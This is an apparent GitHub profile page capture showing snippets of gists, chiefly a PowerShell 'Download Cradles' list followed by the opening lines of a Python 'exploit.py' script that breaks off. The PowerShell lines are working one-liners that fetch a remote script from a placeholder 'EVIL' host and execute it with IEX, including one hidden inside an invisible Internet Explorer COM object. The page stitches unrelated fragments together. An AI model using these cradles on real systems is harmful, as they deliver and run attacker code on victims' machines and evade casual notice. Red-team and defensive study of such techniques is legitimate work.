Skip to content

Instantly share code, notes, and snippets.

View fbkch's full-sized avatar

fbkch fbkch

  • Singapore
View GitHub Profile
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active July 18, 2024 03:59
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import re
import sys
if len(sys.argv) != 2:
print("USAGE: exploit.py <url>")
sys.exit(1)